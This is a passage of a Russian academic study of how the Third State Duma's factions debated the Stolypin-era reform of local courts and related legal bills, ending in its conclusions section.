Представители фракции трудовиков, так же как и октябристско-кадетско-прогрессистское большинство и правительство, были, в целом, согласны с тем, что волостной суд и суд земского участкового начальника не пригодны и должны быть упразднены. Аргументы, которые приводились ими, в принципе мало отличались от аргументов их «соседей справа» (сословный характер судов, отсутствие писаного законодательства, зависимость судов от администрации и т.д.). Однако при мотивировке они педалировали классовый характер суда земского участкового начальника, недоверие к земскому начальнику именно как к представителю чуждого социального слоя: в начальнике крестьяне, по их мнению (подтверждённому данными анкет), видели «барина недоступного крестьянину», наделяя его поэтому априори даже отрицательными моральными качествами. Это говорит об отражении трудовиками определённых почвеннических настроений крестьянства.
Вместе с тем, позиция фракции по отношению к будущему закону, в целом, была далека от одобрительной. Критика ими основных положений законопроекта, в первую очередь, включала в себя категорическое неприятие системы выборов судей, предложенной им. Предполагалось избрание судей органами земского и городского самоуправления на основе сравнительно высокого имущественного, образовательного, полового ценза, ценза оседлости и т.д. В случае недостатка лиц, удовлетворяющих требованиям такового ценза, закон предполагал возможность назначения судей «высочайшей властью» по представлению министра юстиции. Трудовики единым фронтом выступили против практически всех видов ценза, предлагаемого законопроектом (имущественного, оседлости, даже полового), предлагая оставить лишь ценз возрастной и образовательный. Интересна мотивировка этого предложения. С одной стороны, это типичное для значительной части крестьянства недоверие к дворянству, «потеря народной веры в дворян», а также стремление противопоставить социальные элементы «почвы» социальным элементам «цивилизации», признавая первых носителями неких абсолютных моральных ценностей, отказывая вторым в возможности «судить по правде». Так, трудовик А.Е. Кропотов прямо утверждал, что ценз содействует избранию безнравственных людей, психология которых чужда крестьянскому правосознанию, имея в виду под таковыми, прежде всего, предпринимательские элементы деревни, характеризуя их известной крестьянской поговоркой «не отдашь душу чёрту – не будешь богат» [2, ст. 1632]. Вторя ему, ряд депутатов фракции также говорили об «избалованности и неумении владеть собой» состоятельных слоёв населения. Однако, с другой, депутаты-трудовики мотивировали отмену ценза вполне антитрадиционалистским мнением о невозможности в этом случае избрать в судьи квалифицированных, но не состоятельных юристов. Необходимость же сохранения образовательного ценза обосновывается вполне «модернизационным» требованием защиты от ущерба «прав населения» [2, ст. 1291]. Кроме того, трудовики, начисто отвергая возможность назначения судьи административной властью, которую они считали своим врагом, всё же признавали необходимость такового, в случае отсутствия местных квалифицированных юридических кадров, предлагая в качестве альтернативы законопроекту процедуру, в ходе которой администрация будет лишь предлагать избирателям списки кандидатур. Таким образом, можно сказать, что трудовики, не отрицая необходимости правовой модернизации деревни, полагали, что она должна была опираться в известной мере на почвеннические устои.
Трудовики также выступили против предлагаемого законопроектом избрания мирового судьи земскими уездными собраниями и городскими думами. Как и представители леволиберальных партий, трудовики видели в этом стремление правительства и право-центристских группировок Думы «не допустить в мировой суд демократического элемента» [2, ст. 1287], утверждение «сословности суда», его «классового характера». Но в отличие от них трудовики опасались при такой системе выборов, прежде всего, «партийной конъюнктуры» состава мирового суда. Так же как и правые традиционалисты, трудовики считали, что судьями станут «идейно чуждые» им элементы и именно в этом видели главную угрозу. Кроме того, в отличие от проявивших отрицательное отношение к этому же положению законопроекта леволиберальных партий, трудовики предполагали в соответствии с интересами населения (подтверждёнными данными опросов, представленных Думе) не только возможность реформы земств на основе демократического избирательного права, но и избрание судей непосредственно населением мирового участка. Это положение было закреплено ими даже в виде предложения формулы перехода к очередным делам после первого обсуждения законопроекта. Интересны возражения, высказанные членом «трудовой группы» К.М. Петровым 3-м против предлагаемой левыми либералами реформы избирательной системы земств на основе «четырёххвостки» (всеобщего, равного, прямого избирательного права при тайном голосовании). Во-первых, по его мнению, гласные в принципе не могут обладать «достаточной независимостью от постороннего влияния» (т.е. от администрации), а во-вторых, у него сохранялись претензии по отношению к социальному составу земств даже в случае их избрания на принципах демократического избирательного права. В этом видно глубоко коренившееся недоверие, которое испытывала значительная часть крестьянства, рупором которых были трудовики, к представителям цивилизационно чуждой им бюрократии и других «цивилизационных» стратов, стремление изолироваться от них. Даже демократическое избирательное право трактуется ими как участие в выборах «всех сословий в равной мере», а не их полная ликвидация. То есть и в этом требовании проявился, с одной стороны, «модернизационный демократизм», а с другой – стремление построить его базу, учитывая ценности традиционалистской «почвы».
Наконец, трудовики выступали (что также было оформлено предложением Думе соответствующей формулы перехода к очередным делам) ярыми и бескомпромиссными сторонниками не единоличного, а коллегиального суда. Они настаивали на том, чтобы в процессе вместе с мировым (или гминным) судьёй, обладавшим образовательным цензом, на равных правах участвовали два грамотных заседателя без образовательного ценза. В числе заседателей, в первую очередь, они хотели видеть, конечно же, представителей крестьянства. Даже говоря о всесторонне критикуемом ими волостном суде, лидеры трудовиков утверждали, что отрадной чертой в нём является «самодеятельность местного населения в отправлении правосудия», и что именно поэтому волостной суд «плох, но лучше, чем законопроект комиссии» [2, ст. 1470]. Причин поддержки трудовиками коллегиального характера мирового суда было две. С одной стороны, ораторы трудовиков выражали недоверие к «некрестьянским» слоям населения вообще. Их речи были переполнены аргументами о «доступности» и крестьянском характере такого суда. В ход пошли утверждения о наличии у крестьянского населения особой «народной совести» и «народного правосознания», проводниками которых и должны были стать заседатели из крестьян, необходимость знакомства судей с местными условиями и местной крестьянской психологией, которое обеспечат крестьянские члены суда. За ними скрывалось определённое недоверие традиционалистского крестьянства к чуждым им социальным элементам, проникающим деревню, и, конечно же, бюрократии, олицетворяющей враждебное государство. «Нам (т.е. крестьянству – курсив мой Ю.Ш.) больше нянек не нужно, мы им не верим», – так образно выразил эту мысль депутат Г.Е. Рожков [2, ст. 1470]. Недоверие к «интеллигентскому» суду, таким образом, выражало стремление традиционалистского сельского населения обеспечить некоторую корпоративную автономию. Причём в своих речах трудовики обращались и к крестьянским собственникам земли, вышедшим из общины благодаря столыпинской реформе, убеждая и их, что суд без представителей крестьянства «новых нужд ваших хуторских, совсем не будет знать» [2, ст. 1471]. Оправдывалось это, в частности, и тем, что, как и крестьянские депутаты, не входящие во фракцию трудовиков и даже крайне-правые, трудовики настаивали на том, что крестьяне привыкли руководствоваться нормами обычного права, не «приучены» к необходимости «формального предоставления доказательств», а потому в суде для крестьянина нужен «свой человек». Однако в отличие от них трудовики выступали с позиции необходимости постепенного, эволюционного укрепления роли права в жизни крестьянства и в деятельности местного суда путём оформления обычая приговорами волостных сходов и придания им, таким образом, статуса закона. А.И. Кропотов даже предложил формулу перехода к очередным делам, в которой от имени трудовиков внёс дополнение в законопроект, согласно которому «заседатели должны указывать на обычаи и они должны записываться в закон». Таким образом, с точки зрения трудовицких депутатов, необходимо было уравновесить модернизационные элементы суда (в необходимости наличия которых, прежде всего соблюдения в суде закона и в связи с этим присутствия квалифицированных юридических кадров, они, как сказано выше, в принципе не сомневались) контролем над ними со стороны крестьянства. Этот контроль должен был также обеспечить постепенное слияние в практике местного суда норм обычного и позитивного права.
С другой стороны, трудовики выступая сторонниками классового характера государства, просто не верили в возможность появления в России легальным, парламентским путём даже единоличного бесцензового суда, в который допустят крестьянство. Петров 3-й утверждал, что поскольку Дума «не внимает голосу широких народных масс, а ведёт свою и своих единомышленников и буржуев и бюрократов политику», население просто «не верит в способность Государственной думы улучшить жизнь» [2, ст. 1467]. С одной стороны, в этом можно увидеть констатацию невозможности крестьянских представителей воздействовать на законотворческую деятельность в силу действительно чрезвычайно реакционного избирательного закона и механизма государственной власти. Но, с другой – в этом проявилась некоторая недооценка значения политической, парламентской борьбы вообще, характерная для представителей интересов «почвы», предпочтение ей непосредственной, прямой, «народной» демократии.
Таким образом, можно придти к выводу о том, что трудовики при обсуждении законопроекта о преобразовании местного суда выступали сторонниками необходимости модернизации правовой жизни деревни, но постепенной и с опорой на «почвеннические устои». Чтобы обеспечить постепенный синтез традиционалистских и модернизационных начал в деятельности суда они выступали за упразднение волостного суда и суда земского участкового начальника; полное уничтожение всех видов ценза, за исключением образовательного для занятия должности местного судьи; выборность судьи не органами местного самоуправления, а непосредственно избирателями, а также за учреждение коллегиального земского суда, состоящего из мирового судьи с образовательным цензом и двух крестьянских заседателей, не обладавших им, который обеспечит слияние обычного права и позитивного на базе последнего. Позицию фракции, с одной стороны, выступавшую за радикальную демократизацию и «юридизацию» мирового суда, с другой – за сохранение влияния крестьянского элемента на судоустройство, судопроизводство и даже, в некоторой степени, «мировоззрение» местной юстиции в целом можно охарактеризовать как «двойственную».
Что касается другой социалистической фракции российского парламента – социал-демократической, то её ораторы делали упор, в первую очередь, на классовый, а следовательно, неизбежно эксплуататорский характер судопроизводства и права в современном Российском государстве, который невозможно изменить легально в рамках существующей социально-экономической и политической системы. По словам Т.О. Белоусова, «всякий борющийся класс имеет свою идеологию, всякий господствующий свою юриспруденцию». О том, что правосудие имеет классовый характер, по мнению социал-демократов, свидетельствовало и пренебрежение правом во имя классовых интересов современного Российского государства, господство «наряду с писанным правом неписанного произвола» и «самого широкого расширительного толкования закона» [2, ст. 1430]. Смысл реформы, таким образом, по мнению левых социалистов, по-прежнему сводился к обеспечению повиновения и беспрепятственной эксплуатации крестьянства, к обеспечению государственной опеки над сословно неполноправным и невежественным сельским населением. Реформа только сменила форму достижения этой цели. Поэтому социал-демократы призывали трудящихся относиться к ней с «осторожностью».
Реализация даже таких прогрессивных правовых принципов как верховенство права, законность, отдалённость суда от администрации и т.д., провозглашённых реформой, ими одобрялись, но не представляла в их глазах какой-либо самоценности, поскольку могли лишь содействовать дальнейшему развитию капиталистических отношений, пролагающих дорогу единственно справедливым – социалистическим. Реформа и объяснялась социал-демократами необходимостью приспособления к новым капиталистическим формам существования деревни. К ней, по словам Т.О. Белоусова, вёл «общий ход экономической жизни деревни и аграрная политика». С одной стороны, революция «сделала своё дело в воспитании масс сельских рабочих: появились новые условия найма, договора», а «аграрные беспорядки содействовали сильному развитию демократической мысли в деревне» [2, ст. 1435], с другой – классовая дифференциация в деревне создала классовую опору правительства – новых буржуазных землевладельцев, на которых она в новых условиях и желает опереться. Для защиты интересов новых частных собственников и необходимы были новые выборные мировые судьи, обладавшие высоким имущественным цензом.
Отсюда – противоречие. С одной стороны, по мнению социал-демократов, реформа была нужна, депутаты от фракции негодовали, что она не будет распространена, например, на территорию Сибири, считали её меньшим злом, чем сохранение волостного суда и суда земского участкового начальника. А с другой, они же полагали её бесполезной. Бесполезность её они видели в том, что реформа не реализует свой демократический потенциал, что она в силу этого не будет содействовать ликвидации феодальных пережитков в деревне. Взамен социал-демократы предложили весьма туманную и абстрактную конструкцию – выбранный на основе демократического избирательного права коллегиальный суд «для лучшего обсуждения вопросов многогранной жизни низов населения» [2, ст. 1479], Этот суд должен был полностью отказаться от применения обычного права в силу его «реакционности», по той причине, что это право, естественно носящее классовый характер, создавалось в период феодализма и крепостничества, а потому не соответствует потребностям капиталистического развития, являясь тормозом российской деревни на пути к прогрессу. Жёсткая привязка к социально-экономическому критерию объясняет и различную трактовку необходимости упразднения обычного права в деятельности местного суда по сравнению с либеральными партиями. Если либералы на первый план выдвигали интересы правовой защиты личности и собственности в новых исторических условиях, то социал-демократы – то обстоятельство, что обычное право является «тормозом для классовой дифференциации низов населения» [2, ст. 1481].
Отличает их от либералов и резко пессимистическая позиция, вытекающая из парадигмы о классовом характере государства. Они полагали, что в условиях современного политического режима провести модернизационные преобразования местного суда и судопроизводства (ввести всеобщее избирательное право при выборе судей, утвердить коллегиальность суда, заменить обычное право новой кодификацией на основе европейского опыта) невозможно. Во-первых, законодательные учреждения, избранные по избирательному закону, носящему ярко выраженный классовый характер, не пойдут на то, что противоречит их классовым интересам. Во-вторых, и сам правящий режим, в условиях которого вся реальная власть сосредоточена в руках бюрократического аппарата, возглавляемого правительством, носящим ещё более реакционный «продворянский» характер, чем «представительство», не пойдёт на проведение начал демократизации и независимости суда в жизнь. Поэтому улучшать законопроект поправками, по мнению левых социалистов, было не только бесполезно, но и вредно, поскольку они будут представлять собой покрывало для произвола, «лоскуты, оторванные от торжественной мантии культурного государства и пришитые на грязный халат азиатской сатрапии» [2, ст. 1585]. Чрезмерный радикализм, отсутствие позитивной, компромиссной позиции, вытекающий из тезы о классовом характере государственной власти и роли Думы лишь как конституционной фикции, как декорации, призванной обмануть народ, приводил, естественно, к выводу о необходимости революции как единственного пути прогресса, в том числе и в правовой сфере. Поэтому Н.С. Чхеидзе и подытожил критику законопроекта фразой о том, что, по его мнению, «настоящий суд… будет у нас только тогда, когда русский народ и все народности, входящие в состав России, произнесут свой окончательный суд над… настоящими хозяевами страны» [2, ст. 1694].
Таким образом, точка зрения социал-демократической фракции о сугубо классовом характере государства и права, движущимся через капитализм к социализму, приводил социал-демократов к выводу о необходимости построения весьма отвлечённой и абстрактной юридической конструкции органов местного правосудия – «демократический» коллегиальный суд, действующий на основе «обновлённой» кодификации права. Для социал-демократов, таким образом, внешне характерно категорическое отрицание любого приспособления принципов «цивилизации» к нуждам и особенностям традиционалистской «почвы». Хотя фактически отстаивание производственно-корпоративных ценностей и интересов, антисобственнические настроения, неприятие идеи разделения властей и выдвижения вместо этого тезиса о «самодержавии народа» и необходимости организации «прямой демократии» делают их выразителями интересов «почвы», облечённых в новые «индустриальные» одежды. Поскольку в возможности реализации этой конструкции они не верили в силу характера режима, выражавшего интересы реакционных классов, то их позиция по поводу законопроекта носила ярко выраженный деструктивный характер под лозунгом «чем хуже тем лучше», и смысл выступлений сводился фактически к разжиганию революционных настроений в массах.
В общем, можно сделать вывод о том, что позиция, занятая основными группировками и фракциями российского парламента третьего созыва по отношению к основным положениям проектировавшегося правительством проекта преобразования местного суда, наиболее ярко продемонстрировала их отношение к необходимости создания в России основ правового государства, его задачам, а также к принципам, формам и методам его построения. Для правых фракций, отстаивающих (в целом) почвеннические устои, идея формирования в России правового государства и гражданского общества была неприемлема. В связи с этим в процессе обсуждения законопроекта они последовательно отстаивали идею сохранения корпоративного строя общества и традиционалистских начал в области судоустройства и судопроизводства. Октябристы, отражая консервативно-либеральную позицию части российского парламента, рассматривали постулаты правового государства как отдалённую цель и на повестку дня ставили задачу постепенного и осторожного синтеза политико-правовых устоев «почвы» и «цивилизации», отводя главную роль в этом процессе «полуавторитарной», по сути, конструкции государственной власти. В связи с этим главную цель введения модернизационных судебных и правовых институтов они видели, прежде всего, в укреплении доверия общества к государству. Кадеты и примыкавшие к ним депутаты от прогрессистов, польского коло и ряда других национальных группировок видели в принципах правового государства ярко выраженную самоценность. Они являлись сторонниками решительных мер, направленных на переплавку традиционалистских устоев «цивилизацией», отводя главную роль в этом процессе институтам гражданского общества. Вследствие этого в процессе обсуждения законопроекта они явили себя наиболее последовательными и бескомпромиссными сторонниками формирования судебно-правовой базы правового государства. Трудовики и социал-демократы полагали необходимым создать в России «индустриальный вариант почвеннической цивилизации». В связи с чем пропагандировались чисто внешние и крайне абстрактные лозунги, связанные с идеей его построения, скрывающие за собой стремление к консервации традиционалистских устоев на новой идеологической основе. Сама эта идея не предполагала реализации классических принципов правового государства, носила корпоративный характер и использовалась в сугубо «антипозитивных» целях пропаганды идеи полного разрушения политико-правовых основ современной им российской государственности.
ВЫВОДЫ И РЕКОМЕНДАЦИИ
Анализ обсуждения законопроектов, лёгших в основу одного из важнейших составляющих столыпинского модернизационного проекта – реформы судоустройства, судопроизводства и некоторых наиболее важных отраслей материального права начала ХХ в. в Государственной думе, позволяет понять, что взгляды на эту судебную реформу у различных группировок российского парламента начала XX в. находились в теснейшей взаимосвязи с их общей политической позицией по отношению к тем принципам, которые, по их мнению, должны были определять взаимодействие государства, общества и личности. Фракции резко расходились во взглядах: на сущность и соотношение государства и права, феномен гражданского общества, принцип верховенства закона, правовой статус личности, а также на необходимость предоставления гарантий обеспечения её прав и свобод. В связи с этим различались и их воззрения на роль и значение судебных органов в государстве, преступность вообще и политическую преступность в частности, причины преступности, цели наказания, роль государственных органов и общественных организаций в борьбе с нею, отношение населения к методам этой борьбы и т.д.
Фракция правых, считая, что верховный суверенитет целиком и полностью принадлежит исключительно монарху, резко отрицательно относилась к такому постулату правового государства, как необходимость разделения властей вообще, а в особенности, к принципу независимости судебной власти от административной. Представители правых считали, что государственная власть должна быть совершенно определённым образом идеологически ориентирована, а её представители должны выступать носителями их партийной идеологии – идеологии «истинно русских людей», исповедовавшей самодержавие, великорусский национализм, великодержавный имперский шовинизм и «фундаменталистское», «воинствующее» православие в крайних формах. По их мнению, в результате «инфильтрации» чуждыми в этническом и идейном отношении элементами государственный аппарат стал ненадёжен в идеологическом отношении, а потому «спасовал» перед революционной смутой, которую они не считали в полной мере преодолённой. В особенности «ненадёжными» они считали представителей законодательных и судебных органов, которые были относительно автономны от верховного суверена в лице императора. Поэтому в целях скорейшего восстановления порядка в период «смуты» они полагали любой контроль над исполнительными органами, а в особенности над полицейскими структурами абсолютно недопустимым. Фактически они предлагали полностью лишить общество возможности оказывать хоть какое-либо влияние на административно-полицейские структуры империи (которым они, однако, полностью также не доверяли по идеологическим мотивам). Вследствие этого при обсуждении всех законопроектов, предложенных правительством, правые последовательно отстаивали принципы минимизации независимого судебно-прокурорского контроля над полицией и администрацией, уменьшения роли судебной власти в процессе смягчения наказания, устранения принципа независимости в организации местного мирового суда.
В связи с этим правые фактически не признавали необходимости формирования в России основ гражданского общества. Фактически причина крылась в недоверии по отношению к обществу. Фракция в дебатах по поводу реформы полагала, что население в силу той же «идеологической ненадёжности» ещё не «доросло» до реформ, что оно находится под влиянием «враждебных элементов» революционного толка, а его представители склонны выражать не государственную, а «обывательскую» точку зрения. Поэтому её представители в ходе обсуждений практически всех законопроектов выступали сторонниками консервации патриархальной политической культуры населения, в особенности крестьянского (на поддержку которого они в основном ориентировались), полагая, что народным вождём в мире политики может выступать исключительно дворянство (представителям чиновничьего мира они, в силу вышеуказанных причин, не доверяли). Таким образом, правыми пропагандировалось не приобщение подавляющей части населения к участию в политической жизни, активному влиянию на неё, а выдвигались совершенно противоположные лозунги. В связи с этим при обсуждении законопроектов правые выступали против расширения влияния общества на государственную и, в частности, на судебную власть таких общественных институтов, как суд присяжных, патронаты, выборный мировой суд, адвокатура, да и сама Государственная дума.
На право ораторы с крайне-правых скамей смотрели исключительно как на инструмент государственной власти. В связи с этим правые отвергали такой основополагающий принцип современного государства, как верховенство закона. Функции государства и органов юстиции заключались, на их взгляд, лишь в выполнении воли суверена и реализации всё той же идеологии «истинно русских людей». В связи с этим правые, в процессе обсуждения законопроектов судебной реформы, отстаивали необходимость сохранения исключительных положений, чрезвычайных судов, которые, на их взгляд, лишь компенсировали идейную ненадёжность кадров обычных судебных учреждений. Они выступали сторонниками: ограничения контроля судебной власти и прокуратуры над деятельностью чиновников; необходимости сохранения контроля и надзора правительства (в частности, Минюста) над судебными институтами и минимизации роли «писаного законодательства», права в местных судах.
Резко отрицательно правые относились к принципу равенства всех перед законом. Являясь сторонниками сохранения и укрепления сословного строя, члены фракции в то же время выступали за государственный и судебно-правовой остракизм по отношению к таким экономическим, социальным и этническим элементам, как предприниматели, интеллигенция, еврейство (и некоторые другие национальные меньшинства), которых считали идейными врагами. Поэтому, дебатируя законопроекты, фракция выступала за судебно-правовую изоляцию крестьянства, уменьшение влияния на суды интеллигенции, капиталистов, евреев, а также всемерное «ужесточение» в их отношении норм уголовного права и процесса.
Наконец, правые в процессе обсуждения законопроектов показали себя противниками такого постулата правового государства, как свобода личности, гарантированность гражданских прав и свобод, связанного с принципом взаимной ответственности гражданина и государства. Поскольку право для них, как уже указывалось, являлось инструментом в руках государства, правовой статус личности, на их взгляд, должен был характеризоваться отсутствием всякой автономии от государственной власти. Выдвигая лозунг «государство превыше всего», причём понимая под последним фактически административно-полицейские органы, правые были сторонниками необходимости полного подчинения личности административно-государственным интересам. Кроме того, патриархальные, традиционалистские начала воспринимались правыми как безусловная ценность, и в связи с этим сама свобода трактовалась ими как сословная привилегия. Поэтому преобладающее значение в трактовке свободы для них имело стремление к ограждению узкосословных прав. Вследствие этого в процессе обсуждения законопроектов об ответственности должностных лиц за посягательство на права подданных, правые считали наиболее важным оградить не интересы частных лиц, а «энергию» чиновников, которую они должны были проявлять в борьбе против «революционной заразы», угрожавшей государству. В процессе обсуждения законопроектов, имевших целью гуманизацию пенитенциарной политики, правые, полагая, что «злая воля» преступника абсолютна, а политическая преступность порождает и провоцирует всякую другую преступность, и считая святой обязанностью государства бороться против неё исключительно репрессивными методами жёсткой превенции, выступили их противниками. Они выступали против условного осуждения и условно-досрочного освобождения преступников или, по крайней мере, за максимальное сужение возможности применения этих мер индивидуализации и гуманизации наказания. Обсуждая законопроект о преобразовании местного суда, правые последовательно отстаивали непригодность для крестьянства процедурных и организационных форм судебного процесса, применявшихся в системе обычных, несословных судов, т.е. форм, основанных на ограждении прав личности посредством гарантий, установленных законом (верховенства закона в суде, независимости и профессионального характера суда, независимой адвокатуры). В этом проявилось крайне негативное отношение правых к автономии личности от государства, к предоставлению ей возможности самостоятельно отстаивать свои права перед лицом государственных органов. Фактически это означало отсутствие стремления правых депутатов повышать политическую и правовую культуру народа, содействовать преодолению его правового нигилизма – следствия многовековой отсталости.
Таким образом, можно сделать вывод о том, что правые в процессе обсуждения судебной реформы в Третьей Государственной думе выражали не только специфические классовые, социально-экономические но и «цивилизационные интересы», будучи непримиримыми противниками модернизации политико-правовой сферы российского общества. В процессе обсуждения серии законопроектов, имевших целью обновление судебно-организационной и правовой систем империи, они отстаивали необходимость сохранения таких традиционалистских устоев, как: сословный строй, сословная и национально-религиозная обособленность крестьянства, его изоляция от проникновения политических, социальных, экономических, правовых элементов модернизации, угрожавших сословно-корпоративной и «цивилизационной» изоляции сельских жителей, привилегированное положение дворянского сословия, сохранение патриархального и религиозного характера судопроизводства, неприятие принципов либерализма и демократии, идеи правового государства. (Это однако не исключало некоторого своеобразия взглядов на эти принципы дворянских правых депутатов, акцентировавших внимание: на отстаивании своих сословных привилегий, упрочении влияния своего сословия на политическую жизнь страны и необходимости идеологизации государственного механизма; крестьянских депутатов фракции, обращавших большее внимание на отстаивание сословно-корпоративной и «цивилизационной» обособленности крестьянства и депутатов от духовенства, ориентировавшихся на необходимость сохранения духовных, национально-религиозных традиционалистских устое.) Дебаты обнаруживают ясное стремление основной массы членов фракции, используя политическую и социальную демагогию, поддержать низкую правовую культуру основной массы населения, законсервировать правовой нигилизм широких народных масс в целях отстаивания своих реакционных «почвеннических» политико-правовых идеалов.
Октябристы также признавали властный суверенитет за монархом, однако в отличие от правых выступали за то, чтобы эта власть в интересах прав общества и отдельных его членов была ограничена законом, гарантом чего они признавали принцип разделения властей. Но октябристы «главной», «основной» ветвью власти всё же склонны были считать власть административную, исполнительную, управляемую непосредственно сувереном. По их мнению, эта власть, выражая общественные интересы, должна была в то же самое время контролировать общество. Поэтому для представителей центра в процессе обсуждения реформы было характерно стремление достичь компромисса с правительством, инициирующим законопроекты, лежавшие в её основе, иногда даже за счёт принципиальных моментов, с которыми представители фракции не всегда были согласны. Тактика компромисса, присущая центру, выражалась в выступлении против поправок, исходящих со скамей, расположенных слева от них и пытавшихся «выровнять» влияние различных ветвей власти на смягчение участи преступников, на контроль над чиновничьим аппаратом и на деятельность местного суда.
Октябристы, возлагая большие надежды на пробуждение «общественной инициативы» и «самодеятельности», в том числе в сфере судоустройства, судопроизводства и пенитенциарной политики, будучи вследствие этого безусловными сторонниками формирования в России сильного гражданского общества, тем не менее, не слишком доверяли ему. Причина этого в том, что октябристы полагали, что население России ещё не созрело для взаимодействия с властью «на равных» на базе либеральных ценностей. А потому придерживались точки зрения, согласно которой необходимо было расширение участия гражданского общества в управлении делами государства, но постепенное и под контролем властного аппарата. Государство, на их взгляд, должно было не только служить обществу, но и надзирать за ним. По их мнению, общественная инициатива должна, прежде всего, обслуживать государственные интересы и быть в связи с этим в определённой степени подчинена государству. Поэтому в процессе обсуждения законопроектов они, сохраняя своей целью в отличие от правых развитие общественного самоуправления (патронатов, суда присяжных, выборного мирового суда и т.д.), выступали против чрезмерного, с их точки зрения, усиления общественного элемента и ослабления полицейско-бюрократического, предлагаемого фракциями, занимавшими левые скамьи. Главной целью политики октябристов по отношению к обществу, таким образом, фактически становилось укрепление доверия общества к власти, зачастую не институциональными, а пропагандистскими средствами.
В соответствии с такой точкой зрения, на право октябристы смотрели как на инструмент, защищающий интересы личности, но, в первую очередь, не от государства, а через посредство государства. В процессе обсуждения законопроектов реформы центристы постоянно напоминали, что право, закон – есть средство ограждения личных прав. Однако в интересах общества, в целом, они должны защищать государство и его представителей. Поэтому они выступали против чрезмерного расширения возможностей смягчения наказаний для политических преступников, подчинение патронатных организаций государству.
«Союзники», являясь сторонниками равенства всех перед законом, идя навстречу представителям административно-полицейской власти, не испытывая доверия к обществу, преследуя тактические цели в процессе обсуждения реформы, допускали отступления от него. Так, октябристы соглашались с минимизацией применения принципов индивидуализации и гуманизации наказания по отношению к политическим преступникам, ограничением ареала распространения действия мирового суда, ограничением прав евреев в области судоустройства и судопроизводства и т.д.
Наконец, в отношении, безусловно признаваемой ими необходимости обеспечения прав и свобод личности октябристы (сохраняя приоритет государства и государственности) в отношении взаимной ответственности государства и личности отдавали безусловный приоритет ответственности личности перед государством. Отсюда – противоречивость и непоследовательность позиции фракции, с одной стороны, признающей правовую автономию личности и необходимость её защиты от государственного произвола, а с другой – ищущей соглашения с властью иногда за счёт сужения этой автономии. Это выразилось в сохранении самого института административной гарантии (при признании необходимости её значительного сужения), ограничении прав личности в процессе применения к ней условного осуждения и условно-досрочного освобождения (при признании необходимости существенного расширения применения этих мер, по сравнению с правительственным законопроектом), отклонении поправок левых фракций, позволяющих личности с большей полнотой отстаивать свои права в местном суде (в сочетании с поддержкой и даже некоторым расширением ряда прогрессивных в этом плане положений законопроекта).
Таким образом, можно сделать вывод о том, что «центр» Думы, в целом, выступал за постепенный синтез систем права, судоустройства и судопроизводства, характерных для традиционалистской «почвы» и модернизационной «цивилизации». Октябристы выступали в отличие от правых за ассимиляцию устоев «почвы» «цивилизацией», за поглощение крестьянского традиционализма правовым строем, а не наоборот. В этом выразилось характерное для представителей консервативного либерализма стремление постепенно и крайне осторожно приспособить российскую деревню, в частности, и значительную часть российского общества к модернизации, укрепив, прежде всего, доверие к её устоям. (В степени этой постепенности и осторожности и выразились внутрифракционные различия.) Однако недоверие к степени готовности общества (которое действительно было настроено в большинстве своем «антилиберально») адекватно воспринять модернизационные цели развития привело октябристов к выводу о необходимости приоритета не институциональных преобразований, способствующих формированию гражданского общества, а укрепления доверия населения к государственной власти как основного средства преодоления традиционализма.
Леволиберальные фракции Третьей Государственной думы (к числу которых можно причислить кадетов, прогрессистов и национальные фракции) выступали безусловными сторонниками народного суверенитета, а потому полагали, что государственная власть должна, безусловно, служить интересам общества. В силу этого они выступали сторонниками наиболее последовательного и полного проведения принципа разделения властей. Леволиберальные фракции российского парламента отстаивали необходимость реализации этого постулата правового государства в процессе обсуждения всех законопроектов, имевших отношение к судебной реформе. Дебатируя законопроекты об условном осуждении и условно-досрочном освобождении, они добивались расширения полномочий судебных органов в праве выносить решение о применении этих мер. В отношении законопроектов, усиливавших ответственность должностных лиц за противозаконные деяния, левые либералы выступили за замену «смешанных присутствий», нарушавших принципы судейской свободы и беспристрастности обычными судами, и в целом – за создание более благоприятных условий для усиления независимого судебного контроля над администрацией. В процессе обсуждения законопроекта об изменении порядка предания суду левые либералы также делали акцент на максимальной независимости всего процесса судебного разбирательства от узко понимаемых «государственных интересов», под которыми зачастую скрывались интересы чисто административные. Обсуждая реформу местного суда, кадеты и примыкавшие к ним думские фракции делали акцент на создание гарантий его независимости по отношению к Министерству юстиции (например, возражали против назначения министром председателя мирового съезда).
Левые думские фракции в полном соответствии со своей доктриной народного суверенитета считали, что не государство должно контролировать гражданское общество, а наоборот, гражданское общество должно всецело подчинить себе государство. На реализацию этого постулата были направлены их поправки, относившиеся к законопроектам судебной реформы. Обсуждая методы гуманизации и индивидуализации уголовных наказаний, кадеты и примыкавшие к ним, считая, что современное им государство чрезмерно изолировано от гражданского общества, а право в силу этого «политизировано», выступали: за более широкое и самостоятельное развитие общественной инициативы в лице патронатных организаций и таких институтов влияния общества на судебную власть, как суд присяжных и планирующихся ювенальных судов. Политическую преступность они считали менее опасной для общества, поскольку она была следствием недостаточного учёта государством интересов социума. Огромное внимание в процессе обсуждения законопроектов реформы левые либералы уделяли необходимости усиления роли такого мощного инструмента формирования гражданского общества, как местное самоуправление; они выступали за повышение его роли и в процессе преследования должностных лиц и в создании местного суда. Кроме того, необходимость усиления общественного влияния на судебные институты государственной власти проявлялась в требовании кадетов отменить имущественный ценз при формировании выборных органов местного суда.
В соответствии с доктриной, которой придерживались в целом все леволиберальные фракции, право (в основе которого не политические и социальные интересы, а общечеловеческие ценности, главной из которых является «гуманность») должно было стоять выше государства, связывать его, заставлять выполнять свои требования. В отличие от правительства, октябристов и правых эти фракции не рассматривали закон как орудие государства, ставя право выше «политики», признавая его самостоятельной силой. Таким образом, они выступали провозвестниками идеи правового государства на российской политической арене и безусловными сторонниками соблюдения принципа верховенства закона. В соответствии с этим левые либералы в процессе обсуждения проекта устройства местного суда выступали сторонниками необходимости сужения сферы применения обычая, большей его формализации с целью придания ему «правового характера». Дебатируя же законопроекты, связанные с контролем над законностью деятельности бюрократии, и мероприятиями, совершенствующими пенитенциарную политику, они сражались за резкое сужение сферы внесудебного «усмотрения» различного рода административных органов власти.
Левые либералы являлись абсолютно бескомпромиссными сторонниками неукоснительного соблюдения принципа равенства всех перед законом. Поэтому они категорически выступали против любых редакций законопроектов судебной реформы и поправок, изымающих из их сферы действия определённые территории или определённые группы населения, не вызывающие доверия власти или более правых фракций (евреев, мусульман, горожан, интеллигенции и т.д.).
